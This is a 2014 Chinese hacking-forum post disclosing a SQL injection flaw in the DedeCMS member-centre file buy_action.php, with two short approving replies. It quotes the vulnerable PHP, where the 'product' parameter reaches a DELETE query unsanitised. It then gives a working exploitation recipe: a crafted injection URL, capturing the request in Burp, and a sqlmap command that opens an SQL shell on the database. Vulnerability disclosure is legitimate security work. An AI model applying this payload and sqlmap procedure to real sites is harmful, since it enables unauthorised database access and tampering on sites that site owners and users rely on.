查看: 12112|回复: 2

Dedecms 会员中心注入漏洞

[复制链接]
发表于 2014-2-27 19:27:46 | 显示全部楼层 |阅读模式
漏洞作者: Matt

在member/buy_action.php文件处,

[PHP] 纯文本查看 复制代码
require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';
 
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
 
if(isset($pd_encode) && isset($pd_verify) && md5
 
("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify)
{
 
    parse_str(mchStrCode($pd_encode,'DECODE'),$mch_Post);
    foreach($mch_Post as $k => $v) $$k = $v;
    $row  = $dsql->GetOne("SELECT * FROM #@__member_operation WHERE
 
mid='$mid' And sta=0 AND product='$product'");
    if(!isset($row['buyid']))
    {
        ShowMsg("请不要重复提交表单!", 'javascript:;');
        exit();
    }
    if(!isset($paytype))
    {
        ShowMsg("请选择支付方式!", 'javascript:;');
        exit();
    }
    $buyid = $row['buyid'];
 
}else{
 
    $buyid = 'M'.$mid.'T'.$mtime.'RN'.mt_rand(100,999);
    //删除用户旧的未付款的同类记录
    if(!empty($product))   
    {
        $dsql->ExecuteNoneQuery("Delete From #@__member_operation WHERE
 
mid='$mid' And sta=0 And product='$product'");//注入点
    }


漏洞证明:

利用方式 注册用户之后登陆

打开http://127.0.0.1/dede/member/buy_action.php?product=1' and @`'` and

1=1* and '1'='1

先利用burp抓一下访问包

然后将抓到的内容保存

然后利用sqlmap进行注入 执行如下命令

sqlmap.py -r c:\1.txt --sql-shell --threads=10 --dbms mysql

其中的1.txt就是我们保存的包文件

1.jpg

2.jpg

回复

使用道具 举报

发表于 2014-2-27 19:47:55 | 显示全部楼层
这个很赞的。
回复 支持 反对

使用道具 举报

发表于 2014-2-28 00:48:52 | 显示全部楼层
赞一个啦 辛苦了 这么晚
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 18:08 , Processed in 0.090220 second(s), 25 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部